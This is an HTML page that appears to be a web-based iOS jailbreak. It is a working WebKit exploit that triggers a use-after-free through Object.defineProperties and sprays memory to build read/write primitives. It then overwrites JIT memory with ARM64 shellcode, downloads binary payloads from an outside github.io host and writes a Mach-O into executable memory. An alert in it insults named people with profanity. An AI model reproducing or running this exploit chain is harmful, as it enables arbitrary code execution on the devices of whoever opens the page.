
 <html>
 <head>
 <meta name="viewport" content="user-scalable=1.0,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0">
 <meta name="apple-mobile-web-app-capable" content="yes">
 <meta name="format-detection" content="telephone=no">
<style>
 body {
 overflow: hidden;
 position: fixed;
 position: relative;
 }
 h1{
 overflow: hidden;
 position: fixed;
 position: absolute;
 top: 30%;
 left: 50%;
 transform: translate(-50%, -50%);
 }

 </style>
</head>
 <body>
<script>
 function load_binary_resource(url) {
 var req = new XMLHttpRequest();
 req.open('GET', url, false);
 req.overrideMimeType('text\/plain; charset=x-user-defined');
 req.send(null);
 if (req.status != 200) {document.write("fail downloading loader");stop=1};
 return req.responseText;
 }
 
 var mem0=0;
 var mem1=0;
 var mem2=0;
 function read4(addr) {
 mem0[4] = addr;
 var ret = mem2[0];
 mem0[4] = mem1;
 return ret;
 }
 
 function write4(addr,val) {
 mem0[4] = addr;
 mem2[0] = val;
 mem0[4] = mem1;
 }
 
 
 filestream = load_binary_resource("https://chasefromm17.github.io/exec.dms")
 
 var shll = new Uint32Array(filestream.length/4);
 
 for(var i = 0; i < filestream.length; )
 {
 var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i+1) & 0xff) << 8)  | ((filestream.charCodeAt(i+2) & 0xff) << 16)  | ((filestream.charCodeAt(i+3) & 0xff) << 24);
 shll[i/4] = word;
 i+=4;
 }

var print = alert;

_dview = null;

function u2d(low, hi) {
    if (!_dview) _dview = new DataView(new ArrayBuffer(16));
    _dview.setUint32(0, hi);
    _dview.setUint32(4, low);
    return _dview.getFloat64(0);
}

var pressure = new Array(400);
var bufs = new Array(10000);

dgc = function() {
	for (var i = 0; i < pressure.length; i++) {
		pressure[i] = new Uint32Array(0x40000);
	}
}
 

function swag() {
	if(bufs[0]) return;

	dgc();

	for (i=0; i < bufs.length; i++) {
		bufs[i] = new Uint32Array(0x100*2)
		for (k=0; k < bufs[i].length; )
		{
			bufs[i][k++] = 0x41414141;
			bufs[i][k++] = 0xffff0000;
		}
	}
}
 
 var trycatch = "";
 for(var z=0; z<0x2000; z++) trycatch += "try{} catch(e){}; ";
 var fc = new Function(trycatch);

 var fcp = 0;
 var smsh = new Uint32Array(0x10)
function smashed(stl) {
 document.body.innerHTML = "win! " + smsh.length;

 var jitf = (smsh[(0x10+smsh[(0x10+smsh[(fcp+0x18)/4])/4])/4]);

 
 smsh[jitf/4] = 0xd28024d0;
 smsh[jitf/4 +1] = 0x58000060;
 smsh[jitf/4 +2] = 0xd4001001;
 smsh[jitf/4 +3] = 0xd65f03c0;
 smsh[jitf/4 +4] = jitf + 0x20;
 smsh[jitf/4 +5] = 1;
 
 fc();
 
 var dyncache = smsh[(jitf+0x20)/4];
 var dyncachev = smsh[(jitf+0x20)/4];
 var go = 1;
 while(go) {
    if(smsh[dyncache/4] == 0xfeedfacf)
    {
        for(i=0; i < 0x1000/4; i++) {
            if( smsh[dyncache/4 + i] == 0xd &&
                smsh[dyncache/4 + i + 1] == 0x40 &&
                smsh[dyncache/4 + i + 2] == 0x18 &&
                smsh[dyncache/4 + i + 11] == 0x61707369) // lulziest mach-o parser ever
            {
                go = 0;
                break;
            }
        }
    }
    dyncache += 0x1000;
 }
 dyncache -= 0x1000;
 var bss = [];
 var bss_size = [];

 for(i=0; i < 0x1000/4; i++) {
        if( smsh[dyncache/4 + i] == 0x73625f5f && smsh[dyncache/4 + i + 1] == 0x73) { // lolhax
 bss.push(smsh[dyncache/4 + i + (0x20/4)] + dyncachev-0x80000000);
 bss_size.push(smsh[dyncache/4 + i + (0x28/4)]);

 }
    }
 
 
 
 
 var shc = jitf/4;
 
 
 
 

 var filestream = load_binary_resource("https://chasefromm17.github.io/loader.dms")
 
 for(var i = 0; i < filestream.length; )
 {
 var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i+1) & 0xff) << 8)  | ((filestream.charCodeAt(i+2) & 0xff) << 16)  | ((filestream.charCodeAt(i+3) & 0xff) << 24);
 smsh[shc++] = word;
 i+=4;
 }
 
 jitf &= ~0x3FFF;
 jitf += 0x8000;
 smsh[shc++] = jitf;
 smsh[shc++] = 1;

 // copy macho

 for(var i = 0; i < shll.length; i++)
 {
 write4(jitf+i*4,shll[i]);
 }

 alert("fuck cole cabral & LaughingQuoll. Also, Jake Paul never lied to anybody. Please also don't ever listen to the first 38 seconds of Sarajevo Christmas Eve 12/24 - no matter if it's normal, or reversed. Your jailbreak has been reactivated again. Press the power button to lock your device, and wait for notifications to display on your lockscreen, and wait for the the SpringBoard to be killed and relaunch itself.")
 for(var i = 0; i < bss.length; i++)
{
 for(k=bss_size[i]/6; k < bss_size[i]/4; k++) {
    write4(bss[i] + k*4,0);
 }
}
 fc();
 
 alert(2);
 }
 
 
 function go() {
 document.body.innerHTML = "<h1>reactivating, please wait...</h1>";
 setTimeout(go_, 100);
 }
 function go_(){
 if (smsh.length != 0x10) {
 smashed(); return;
 }

var arr = new Array(0x100);
var yolo = new ArrayBuffer(0x1000);
arr[0] = yolo;
arr[1] = 0x13371337;

var not_number = {};
not_number.toString = function() {
	arr = null;
	props["stale"]["value"] = null;
	swag();
	return 10;
};

var props = {
	p0 : { value : 0 },
	p1 : { value : 1 },
	p2 : { value : 2 },
	p3 : { value : 3 },
	p4 : { value : 4 },
	p5 : { value : 5 },
	p6 : { value : 6 },
	p7 : { value : 7 },
	p8 : { value : 8 },
	length : { value : not_number },
	stale : { value : arr },
	after : { value : 666 } 
};

var target = [];
var stale = 0;
var before_len = arr.length; 
Object.defineProperties(target, props);
stale = target.stale;

stale[0] += 0x101;
stale[1] = {}

for(var z=0; z<0x1000; z++) fc();


for (i=0; i < bufs.length; i++) {
  for (k=0; k < bufs[0].length; k++){
	if(bufs[i][k] == 0x41414242){
	    stale[0] = fc;
        fcp = bufs[i][k];
 
 
        stale[0] = {'a':u2d(105, 0x1172600),'b':u2d(0,0),'c':smsh,'d':u2d(0x100,0)}
	    stale[1] = stale[0]

	    bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
        bck = stale[0][4];
        stale[0][4] = 0; // address, low 32 bits
		// stale[0][5] = 1; // address, high 32 bits == 0x100000000
		stale[0][6] = 0xffffffff;

 mem0 = stale[0];
 mem1 = bck;
 mem2 = smsh;
        bufs.push(stale)
	    if (smsh.length != 0x10) {
            smashed(stale[0]);
	    }

 stale[0][4] = bck;
        stale[0][6] = 0x10;
 
 bufs[i][k] -= 0x10; // FIXUP
 
 bufs.push(stale[0]);
 bufs.push(stale[0]);
 stale[0] = 0x41414141;
 stale[1] = 0x41414141;
 stale[2] = 0x41414141;
 
 
 bufs.push(stale[0]);
 bufs.push(stale);
 
 
        return;
	}
   }
 }
 document.location += '#';
 }


 </script>



<center><a href="javascript:go()"><h1>go</h1></a></center>
</body>
</html>

